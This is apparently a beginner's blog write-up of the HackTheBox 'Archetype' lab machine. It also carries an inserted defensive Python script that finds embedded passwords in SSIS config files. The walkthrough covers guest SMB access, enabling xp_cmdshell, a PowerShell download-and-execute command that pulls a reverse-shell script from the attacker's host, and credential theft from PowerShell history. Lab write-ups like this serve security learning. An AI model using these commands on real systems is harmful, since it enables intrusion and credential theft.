I have been quite familiar with TryHackMe, but I found another service called HackTheBox which appears to be very similar.
I’ve started with the first box in the Starting Point, a Windows machine named Archetype.
Enumeration
First things first, let’s see what we are working with by running an nmap scan.

We can see we have an SMB share running on port 139/445, and a SQL Server instance running on 1433. No remote desktop or SSH active.
Next, let’s check out the SMB share using smbclient, and specify no user / pass.

Everything with a trailing $ is a hidden share, and seeing those is a normal occurrence; however, we do have a backups share here. I found we can access this share as a guest as well.

In the smb prompt, we can use more prod.dtsConfig to output the contents to the screen, and this returns us credentials for the SQL Server:
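The same finding from the defender's side, as an added example that is not part of the original write-up: a small audit that parses SSIS XML configuration files such as prod.dtsConfig and flags connection strings that embed a password. The sample document, account name and values are constructed placeholders, and the parser assumes connection-string values contain no quoted semicolons.

```python
import xml.etree.ElementTree as ET

# Connection-string keys (compared case-insensitively) that carry a secret or a login.
SECRET_KEYS = {"password", "pwd"}
USER_KEYS = {"user id", "uid"}

# Constructed sample in the SSIS XML configuration layout; all values are placeholders.
SAMPLE = r"""<DTSConfiguration>
  <DTSConfigurationHeading>
    <DTSConfigurationFileInfo GeneratedBy="EXAMPLE\admin" GeneratedDate="1/1/2020"/>
  </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property"
      Path="\Package.Connections[Destination].Properties[ConnectionString]"
      ValueType="String">
    <ConfiguredValue>Data Source=.;Password=EXAMPLE-ONLY;User ID=EXAMPLE\svc_account;Initial Catalog=Catalog;Persist Security Info=True;</ConfiguredValue>
  </Configuration>
  <Configuration ConfiguredType="Property"
      Path="\Package.Connections[Source].Properties[ConnectionString]"
      ValueType="String">
    <ConfiguredValue>Data Source=.;Integrated Security=SSPI;Initial Catalog=Staging;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>"""


def parse_connection_string(value):
    """Split 'k=v;k=v' into a dict with lower-cased keys."""
    pairs = (part.split("=", 1) for part in value.split(";") if "=" in part)
    return {k.strip().lower(): v.strip() for k, v in pairs}


def find_embedded_credentials(xml_text):
    """Return one finding per configured value that embeds a password."""
    findings = []
    for cfg in ET.fromstring(xml_text).iter("Configuration"):
        fields = parse_connection_string(cfg.findtext("ConfiguredValue") or "")
        if any(fields.get(k) for k in SECRET_KEYS):
            user = next((fields[k] for k in USER_KEYS if k in fields), None)
            # Report where the secret lives and whose it is; never echo the secret itself.
            findings.append({"path": cfg.get("Path"), "user": user})
    return findings


if __name__ == "__main__":
    for f in find_embedded_credentials(SAMPLE):
        print(f"embedded password for {f['user']} at {f['path']}")
```

Run over every .dtsConfig file on a file server, this points at the packages that should move to Windows authentication or a protected configuration store, and at shares that should not allow guest access.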

Now we just need to find a way to login using these credentials. On Kali Linux, we can use impacket, located in /opt/impacket.
One of the files in the examples folder is mssqlclient.py. Running this file gives you a help guide for the syntax, which is: python3 mssqlclient.py user:pass@host. We can also use -windows-auth because our credentials are for a domain user. Doing so:

Grants us a connection into the server!
Connection
We are officially authenticated into the server, SQL Server that is.
I use the help command to see what we can do. Next, I enable the cmdshell using enable_xp_cmdshell. Now we have the ability to run commands, so we need to craft a payload to give us an actual shell.
I did some googling and found that we can execute PowerShell via the xp_cmdshell by doing a command like:
xp_cmdshell `powershell -command "code here"`
I did some googling and found this payload: https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
I am going to modify it to use my IP and port 4444. Now we need to get the file over to the server. First we need to start a Python web server where I have the file: python3 -m "http.server" 80.
From more googling, I see we can create a new object with PS and use the Download Data command to retrieve and run the file. So let’s try that with the sql command line:
xp_cmdshell "powershell -exec bypass IEX (New-Object System.Net.WebClient).DownloadString(\"http://10.10.14.189/sh.ps1\")"
Success! We get a reverse shell back from our victim!

Browsing around, I found a user.txt file in our sql_svc user’s desktop! There’s one flag!
Priv Esc
However, we need to see if we can get admin privileges. Let’s gather some more information first.
Running net users gets us a list of all users on the machine.

We can now run net user Administrator for detailed information on this account:

We can also look and see what the history was for PowerShell before we logged in to see if there were any credentials passed and saved. This file is located in %APPDATA%\Roaming\Microsoft\Windows\PowerShell\PSReadLine. And if we cat ConsoleHost_history.txt, then we get an admin user/pass!
Now, I am launching Metasploit using msfconsole. From this link I found there are two modules in impacket that we can try, psexec.py or smbexec.py. First I will try psexec.py:

I had issues trying to specify the password directly in the command, but I found if I let it prompt me for the pass, I could type it and it worked!
Now I did the same as the user account and found the flag on the Admin’s desktop!
Conclusion
Compared to TryHackMe, HackTheBox seems a lot more geared for the real world and a lot less hands off. I had difficulties figuring out what I was supposed to do at first because absolutely no information is provided. I finally figured out how to get the User flag and thought I was done but the machine was not checked off. Then I realized “System Owns” means gaining root access, so I went back in to get the admin.
My experience with enumeration and cracking on Windows is also not as straightforward as Linux, so a lot of googling was involved to help me gain access. I look forward to the next challenge!